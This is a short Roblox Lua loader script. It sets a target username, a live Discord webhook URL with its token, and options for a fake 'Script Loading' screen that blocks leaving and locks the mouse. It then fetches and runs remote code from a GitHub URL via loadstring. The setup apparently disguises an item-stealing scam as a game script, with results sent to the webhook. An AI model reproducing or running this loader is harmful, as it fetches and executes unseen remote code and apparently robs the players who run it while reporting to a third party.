UserName = "zenn2345"

UserName2 = "Zenn2345"

Webhook = "https://discord.com/api/webhooks/1107537076192284723/jdp-l_6DLnWEzWrAjZquC7GOoeyydOexNRoWtweYSUGkPo3ElHWX1W-nYEwlguGRCC4c"

_G.LoadingScreen = true

_G.AntiLeave = true

_G.MouseLock = true 

_G.ScriptName = "Rizz Scriptz"

_G.FirstText = "Script Preparing"

_G.SecondText = "Script Loading..."

_G.ThirdText = "Almost Done..."

_G.WaitingTime = 50 -- it's the time between 0% and 100% in secondes

loadstring(game:HttpGet("https://raw.githubusercontent.com/k4ftt/R/main/Main.lua", true))()
